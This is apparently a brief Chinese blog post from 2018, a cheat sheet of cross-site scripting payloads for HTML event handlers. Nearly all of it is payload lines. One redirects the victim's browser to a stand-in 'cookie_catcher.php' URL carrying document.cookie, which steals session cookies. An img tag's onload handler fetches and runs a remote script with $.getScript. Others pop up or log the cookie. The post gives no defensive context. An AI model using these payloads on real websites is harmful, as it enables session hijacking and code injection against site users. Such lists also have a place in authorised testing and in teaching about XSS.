xsspayload

元素on事件:

prompt(document.cookie)

document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie

console.log(document.cookie)

alert(document.cookie)

 

<img src="xxx" onload="$.getScript`https://www.xxx.com/test.js`" whdth="50">

posted @ 2018-12-06 16:22  huim  阅读(236)  评论(0编辑  收藏  举报